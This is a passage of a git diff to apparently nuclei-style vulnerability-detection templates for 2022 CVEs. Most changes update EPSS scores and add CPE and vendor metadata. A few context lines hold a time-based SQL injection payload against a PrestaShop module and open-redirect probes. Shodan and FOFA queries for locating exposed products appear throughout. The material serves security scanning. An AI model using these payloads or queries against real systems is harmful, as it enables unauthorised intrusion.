cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
+ epss-percentile: 0.96958
metadata:
max-request: 1
shodan-query: http.title:"GitLab"
diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml
index 796bdbb2ce..147690bba8 100644
--- a/http/cves/2022/CVE-2022-2187.yaml
+++ b/http/cves/2022/CVE-2022-2187.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-2187
cwe-id: CWE-79
- epss-score: 0.00078
+ epss-score: 0.00119
cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45304
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml
index 563d6c81e3..a90ed34b01 100644
--- a/http/cves/2022/CVE-2022-2219.yaml
+++ b/http/cves/2022/CVE-2022-2219.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.2
cve-id: CVE-2022-2219
cwe-id: CWE-79
- epss-score: 0.00117
+ epss-score: 0.00179
cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.5437
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml
index 8796333217..9da34e544c 100644
--- a/http/cves/2022/CVE-2022-22242.yaml
+++ b/http/cves/2022/CVE-2022-22242.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-22242
cwe-id: CWE-79
- epss-score: 0.43398
+ epss-score: 0.40304
cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96776
metadata:
max-request: 1
shodan-query: title:"Juniper Web Device Manager"
diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml
index c1d3bd37f5..1d87af4af2 100644
--- a/http/cves/2022/CVE-2022-22536.yaml
+++ b/http/cves/2022/CVE-2022-22536.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 10
cve-id: CVE-2022-22536
cwe-id: CWE-444
- epss-score: 0.96734
+ epss-score: 0.96538
cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:*
+ epss-percentile: 0.99422
metadata:
max-request: 2
shodan-query: http.favicon.hash:-266008933
diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml
index e9436f1aeb..6273f5e0c1 100644
--- a/http/cves/2022/CVE-2022-22733.yaml
+++ b/http/cves/2022/CVE-2022-22733.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2022-22733
cwe-id: CWE-200
- epss-score: 0.19684
+ epss-score: 0.28675
cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:*
+ epss-percentile: 0.96259
metadata:
max-request: 1
shodan-query: http.favicon.hash:816588900
diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml
index c5eefc9fb6..50b93880dd 100644
--- a/http/cves/2022/CVE-2022-22897.yaml
+++ b/http/cves/2022/CVE-2022-22897.yaml
@@ -15,11 +15,17 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22897
cwe-id: CWE-89
+ epss-score: 0.03722
+ cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*
+ epss-percentile: 0.90593
metadata:
max-request: 2
shodan-query: http.component:"Prestashop"
verified: true
- tags: cve,cve2022,prestashop,sqli,unauth
+ framework: prestashop
+ vendor: apollotheme
+ product: ap_pagebuilder
+ tags: packetstorm,cve,cve2022,prestashop,sqli,unauth
http:
- raw:
@@ -31,7 +37,6 @@ http:
X-Requested-With: XMLHttpRequest
leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)
-
- |
GET /modules/appagebuilder/config.xml HTTP/1.1
Host: {{Hostname}}
@@ -44,7 +49,6 @@ http:
group: 1
regex:
- "\\s*\\s*<\\/version>"
-
matchers:
- type: dsl
dsl:
diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml
index 9bff9ed631..79b9c0b6da 100644
--- a/http/cves/2022/CVE-2022-2290.yaml
+++ b/http/cves/2022/CVE-2022-2290.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-2290
cwe-id: CWE-79
- epss-score: 0.001
+ epss-score: 0.00112
cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:*
+ epss-percentile: 0.43971
metadata:
max-request: 3
shodan-query: title:"Trilium Notes"
diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml
index 8a649e398b..bbd49f3cd1 100644
--- a/http/cves/2022/CVE-2022-22947.yaml
+++ b/http/cves/2022/CVE-2022-22947.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2022-22947
- cwe-id: CWE-94
- epss-score: 0.97552
+ cwe-id: CWE-917,CWE-94
+ epss-score: 0.9754
cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99989
metadata:
max-request: 3
vendor: vmware
diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml
index 062f70d8ac..6d4ace7ffa 100644
--- a/http/cves/2022/CVE-2022-22954.yaml
+++ b/http/cves/2022/CVE-2022-22954.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22954
cwe-id: CWE-94
- epss-score: 0.97526
+ epss-score: 0.97532
cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
+ epss-percentile: 0.99985
metadata:
max-request: 1
shodan-query: http.favicon.hash:-1250474341
diff --git a/http/cves/2022/CVE-2022-22963.yaml b/http/cves/2022/CVE-2022-22963.yaml
index 7b54515327..cb6746ec22 100644
--- a/http/cves/2022/CVE-2022-22963.yaml
+++ b/http/cves/2022/CVE-2022-22963.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22963
cwe-id: CWE-917,CWE-94
- epss-score: 0.97472
+ epss-score: 0.97452
cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99924
metadata:
max-request: 1
vendor: vmware
diff --git a/http/cves/2022/CVE-2022-22965.yaml b/http/cves/2022/CVE-2022-22965.yaml
index f437ca9952..771b343b2b 100644
--- a/http/cves/2022/CVE-2022-22965.yaml
+++ b/http/cves/2022/CVE-2022-22965.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22965
cwe-id: CWE-94
- epss-score: 0.97521
+ epss-score: 0.97502
cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99964
metadata:
max-request: 4
vendor: vmware
diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml
index 726bec8455..1641cdb382 100644
--- a/http/cves/2022/CVE-2022-22972.yaml
+++ b/http/cves/2022/CVE-2022-22972.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-22972
cwe-id: CWE-287
- epss-score: 0.8818
+ epss-score: 0.78281
cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
+ epss-percentile: 0.97824
metadata:
max-request: 3
fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize"
diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml
index fd095d62d8..67d282f1ea 100644
--- a/http/cves/2022/CVE-2022-23102.yaml
+++ b/http/cves/2022/CVE-2022-23102.yaml
@@ -1,4 +1,5 @@
id: CVE-2022-23102
+
info:
name: SINEMA Remote Connect Server < V2.0 - Open Redirect
author: ctflearner,ritikchaddha
@@ -15,18 +16,21 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-23102
cwe-id: CWE-601
+ epss-score: 0.00434
cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.71407
metadata:
max-request: 2
shodan-query: title:"Logon - SINEMA Remote Connect"
- tags: cve,cve2022,redirect,sinema,authenticated
+ vendor: siemens
+ product: sinema_remote_connect_server
+ tags: packetstorm,seclists,cve,cve2022,redirect,sinema,authenticated
http:
- raw:
- |
GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: {{Hostname}}
-
- |
POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
Host: {{Hostname}}
diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml
index f285528851..a4875a5603 100644
--- a/http/cves/2022/CVE-2022-23131.yaml
+++ b/http/cves/2022/CVE-2022-23131.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-23131
cwe-id: CWE-290
- epss-score: 0.97134
+ epss-score: 0.97044
cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99643
metadata:
max-request: 2
fofa-query: app="ZABBIX-监控系统" && body="saml"
diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml
index 5fe2df7d38..2593b0e73e 100644
--- a/http/cves/2022/CVE-2022-23134.yaml
+++ b/http/cves/2022/CVE-2022-23134.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-23134
cwe-id: CWE-287,CWE-284
- epss-score: 0.46222
+ epss-score: 0.48649
cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97026
metadata:
max-request: 2
vendor: zabbix
diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml
index 23d1b79c91..cd4a0a5508 100644
--- a/http/cves/2022/CVE-2022-2314.yaml
+++ b/http/cves/2022/CVE-2022-2314.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-2314
cwe-id: CWE-94
- epss-score: 0.08397
+ epss-score: 0.1914
cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95605
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml
index 4c59f6ea01..bd8f5a768e 100644
--- a/http/cves/2022/CVE-2022-23178.yaml
+++ b/http/cves/2022/CVE-2022-23178.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-23178
cwe-id: CWE-287
- epss-score: 0.03195
+ epss-score: 0.03228
cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:*
+ epss-percentile: 0.89951
metadata:
max-request: 1
vendor: crestron
diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml
index 3c3489d422..a505be7c3f 100644
--- a/http/cves/2022/CVE-2022-23347.yaml
+++ b/http/cves/2022/CVE-2022-23347.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-23347
cwe-id: CWE-22
- epss-score: 0.10923
+ epss-score: 0.10291
cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*
+ epss-percentile: 0.94201
metadata:
max-request: 1
shodan-query: http.html:"BigAnt"
diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml
index 4b99f9b580..c0d3cf0af8 100644
--- a/http/cves/2022/CVE-2022-23348.yaml
+++ b/http/cves/2022/CVE-2022-23348.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-23348
cwe-id: CWE-916
- epss-score: 0.00369
+ epss-score: 0.00323
cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*
+ epss-percentile: 0.66903
metadata:
max-request: 1
shodan-query: http.html:"bigant"
diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml
index d49d56fb21..32e3a7a2bf 100644
--- a/http/cves/2022/CVE-2022-23544.yaml
+++ b/http/cves/2022/CVE-2022-23544.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-918,CWE-79
epss-score: 0.00059
cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:*
+ epss-percentile: 0.22776
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-2373.yaml b/http/cves/2022/CVE-2022-2373.yaml
index 97e0653598..1aa6d765ac 100644
--- a/http/cves/2022/CVE-2022-2373.yaml
+++ b/http/cves/2022/CVE-2022-2373.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-2373
cwe-id: CWE-862
- epss-score: 0.00482
+ epss-score: 0.00401
cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.70313
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml
index 261cc67b8b..d8cd3cf95a 100644
--- a/http/cves/2022/CVE-2022-2376.yaml
+++ b/http/cves/2022/CVE-2022-2376.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-2376
cwe-id: CWE-862
- epss-score: 0.07857
+ epss-score: 0.0701
cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.93088
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml
index 8fb5e32810..6f8ce39e83 100644
--- a/http/cves/2022/CVE-2022-23779.yaml
+++ b/http/cves/2022/CVE-2022-23779.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-23779
cwe-id: CWE-200
- epss-score: 0.00641
+ epss-score: 0.0089
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80566
metadata:
max-request: 1
fofa-query: app="ZOHO-ManageEngine-Desktop"
diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml
index 04bf5c85ab..6009cad5bd 100644
--- a/http/cves/2022/CVE-2022-2379.yaml
+++ b/http/cves/2022/CVE-2022-2379.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-2379
cwe-id: CWE-862
- epss-score: 0.01743
+ epss-score: 0.02717
cpe: cpe:2.3:a:easy_student_results_project:easy_student_results:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.89157
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml
index aed5fd03d2..c91a8c0d4f 100644
--- a/http/cves/2022/CVE-2022-23808.yaml
+++ b/http/cves/2022/CVE-2022-23808.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-23808
cwe-id: CWE-79
- epss-score: 0.00292
+ epss-score: 0.00238
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.6117
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml
index f868d6b2c4..b312693833 100644
--- a/http/cves/2022/CVE-2022-2383.yaml
+++ b/http/cves/2022/CVE-2022-2383.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-2383
cwe-id: CWE-79
- epss-score: 0.00071
+ epss-score: 0.00097
cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.39802
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml
index 3a2cf56f0a..291958317b 100644
--- a/http/cves/2022/CVE-2022-23854.yaml
+++ b/http/cves/2022/CVE-2022-23854.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-23854
- cwe-id: CWE-23,CWE-22
- epss-score: 0.87202
+ cwe-id: CWE-22,CWE-23
+ epss-score: 0.88121
cpe: cpe:2.3:a:aveva:intouch_access_anywhere:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98247
metadata:
max-request: 1
shodan-query: http.html:"InTouch Access Anywhere"
diff --git a/http/cves/2022/CVE-2022-23881.yaml b/http/cves/2022/CVE-2022-23881.yaml
index 632c421094..b57fa95fb5 100644
--- a/http/cves/2022/CVE-2022-23881.yaml
+++ b/http/cves/2022/CVE-2022-23881.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-77
epss-score: 0.29422
cpe: cpe:2.3:a:zzzcms:zzzphp:2.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.96308
metadata:
max-request: 1
vendor: zzzcms
diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml
index fb98f34b8b..cdf30a7a36 100644
--- a/http/cves/2022/CVE-2022-23898.yaml
+++ b/http/cves/2022/CVE-2022-23898.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-23898
cwe-id: CWE-89
- epss-score: 0.01144
+ epss-score: 0.01029
cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:*
+ epss-percentile: 0.81996
metadata:
max-request: 1
fofa-query: icon_hash="1464851260"
diff --git a/http/cves/2022/CVE-2022-23944.yaml b/http/cves/2022/CVE-2022-23944.yaml
index f44860b93f..2ebf60cd06 100644
--- a/http/cves/2022/CVE-2022-23944.yaml
+++ b/http/cves/2022/CVE-2022-23944.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2022-23944
cwe-id: CWE-306,CWE-862
- epss-score: 0.36269
+ epss-score: 0.65738
cpe: cpe:2.3:a:apache:shenyu:2.4.0:*:*:*:*:*:*:*
+ epss-percentile: 0.97456
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml
index ae9b6ec3bf..809d3c46d0 100644
--- a/http/cves/2022/CVE-2022-24112.yaml
+++ b/http/cves/2022/CVE-2022-24112.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-24112
cwe-id: CWE-290
- epss-score: 0.97225
+ epss-score: 0.97343
cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99829
metadata:
max-request: 2
fofa-query: title="Apache APISIX Dashboard"
diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml
index cfb668945d..7f829b17d2 100644
--- a/http/cves/2022/CVE-2022-24124.yaml
+++ b/http/cves/2022/CVE-2022-24124.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-24124
cwe-id: CWE-89
- epss-score: 0.00374
+ epss-score: 0.00846
cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80026
metadata:
max-request: 1
product: "casdoor"
diff --git a/http/cves/2022/CVE-2022-24129.yaml b/http/cves/2022/CVE-2022-24129.yaml
index 7ca82b9312..e14fdb0ce6 100644
--- a/http/cves/2022/CVE-2022-24129.yaml
+++ b/http/cves/2022/CVE-2022-24129.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.2
cve-id: CVE-2022-24129
cwe-id: CWE-918
- epss-score: 0.00656
+ epss-score: 0.00647
cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:*
+ epss-percentile: 0.76687
metadata:
max-request: 1
framework: identity_provider
diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml
index 6fe2dd7f1e..e7f38a8fc1 100644
--- a/http/cves/2022/CVE-2022-2414.yaml
+++ b/http/cves/2022/CVE-2022-2414.yaml
@@ -15,11 +15,16 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-2414
cwe-id: CWE-611
+ epss-score: 0.01359
+ cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:*
+ epss-percentile: 0.84532
metadata:
max-request: 1
fofa-query: title="Identity Management"
shodan-query: title:"Identity Management" html:"FreeIPA"
verified: true
+ vendor: dogtagpki
+ product: dogtagpki
tags: cve,cve2022,dogtag,freeipa,xxe
http:
diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml
index 3abe674a58..2318a4e7f4 100644
--- a/http/cves/2022/CVE-2022-24181.yaml
+++ b/http/cves/2022/CVE-2022-24181.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00131
cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*
+ epss-percentile: 0.47237
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml
index 9ab0c4cf8a..3f3f8d0a16 100644
--- a/http/cves/2022/CVE-2022-24223.yaml
+++ b/http/cves/2022/CVE-2022-24223.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-24223
cwe-id: CWE-89
- epss-score: 0.00691
+ epss-score: 0.00656
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.7689
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml
index 5c786c0c43..fdbb196e8e 100644
--- a/http/cves/2022/CVE-2022-24260.yaml
+++ b/http/cves/2022/CVE-2022-24260.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-24260
cwe-id: CWE-89
- epss-score: 0.60301
+ epss-score: 0.39803
cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96763
metadata:
max-request: 1
shodan-query: http.title:"VoIPmonitor"
diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml
index c42af556e0..e35945731a 100644
--- a/http/cves/2022/CVE-2022-24264.yaml
+++ b/http/cves/2022/CVE-2022-24264.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-24264
cwe-id: CWE-89
- epss-score: 0.05498
+ epss-score: 0.06436
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9277
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml
index e64ecb080f..7cdc8fe80b 100644
--- a/http/cves/2022/CVE-2022-24265.yaml
+++ b/http/cves/2022/CVE-2022-24265.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-24265
cwe-id: CWE-89
- epss-score: 0.05498
+ epss-score: 0.06436
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.9277
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml
index 65adaa725a..6680dfb397 100644
--- a/http/cves/2022/CVE-2022-24266.yaml
+++ b/http/cves/2022/CVE-2022-24266.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-24266
cwe-id: CWE-89
- epss-score: 0.04029
+ epss-score: 0.04372
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.91286
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml
index b7fce1b7aa..64ddfdd688 100644
--- a/http/cves/2022/CVE-2022-24288.yaml
+++ b/http/cves/2022/CVE-2022-24288.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2022-24288
cwe-id: CWE-78
- epss-score: 0.61988
+ epss-score: 0.88109
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98246
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml
index a76a47a8e9..09e80f7ceb 100644
--- a/http/cves/2022/CVE-2022-24384.yaml
+++ b/http/cves/2022/CVE-2022-24384.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-24384
cwe-id: CWE-79
+ epss-score: 0.0012
cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:*
- epss-score: 0.00079
+ epss-percentile: 0.45411
metadata:
max-request: 1
product: smartertrack
@@ -35,4 +36,4 @@ http:
words:
- '"type":"error","text":"Unknown survey\">"'
- 'smartertrack'
- condition: and
\ No newline at end of file
+ condition: and
diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml
index 2d40f7548f..da49ad6098 100644
--- a/http/cves/2022/CVE-2022-2462.yaml
+++ b/http/cves/2022/CVE-2022-2462.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-2462
cwe-id: CWE-200
- epss-score: 0.00712
+ epss-score: 0.00881
cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.80428
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml
index cced1b6d65..4dfa12663c 100644
--- a/http/cves/2022/CVE-2022-2467.yaml
+++ b/http/cves/2022/CVE-2022-2467.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-2467
cwe-id: CWE-89
- epss-score: 0.01501
+ epss-score: 0.01423
cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.84857
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml
index 22e151d10a..387bceae69 100644
--- a/http/cves/2022/CVE-2022-24681.yaml
+++ b/http/cves/2022/CVE-2022-24681.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0017
cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.53409
metadata:
max-request: 1
vendor: zohocorp
diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml
index 5cf4ae33b1..3205702239 100644
--- a/http/cves/2022/CVE-2022-24716.yaml
+++ b/http/cves/2022/CVE-2022-24716.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-24716
cwe-id: CWE-22
- epss-score: 0.32737
+ epss-score: 0.33311
cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96475
metadata:
max-request: 3
shodan-query: title:"Icinga"
diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml
index c2e2c83f49..33dfa17183 100644
--- a/http/cves/2022/CVE-2022-24816.yaml
+++ b/http/cves/2022/CVE-2022-24816.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-24816
cwe-id: CWE-94
- epss-score: 0.85856
+ epss-score: 0.87795
cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98227
metadata:
max-request: 1
fofa-query: app="GeoServer"
diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml
index 843d4142f6..657d1ed329 100644
--- a/http/cves/2022/CVE-2022-24856.yaml
+++ b/http/cves/2022/CVE-2022-24856.yaml
@@ -19,8 +19,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-24856
cwe-id: CWE-918
- epss-score: 0.04251
+ epss-score: 0.04747
cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:*
+ epss-percentile: 0.91616
metadata:
max-request: 1
vendor: flyte
diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml
index e39afcf4b8..a44d421369 100644
--- a/http/cves/2022/CVE-2022-2486.yaml
+++ b/http/cves/2022/CVE-2022-2486.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-2486
cwe-id: CWE-78
- epss-score: 0.97366
+ epss-score: 0.97265
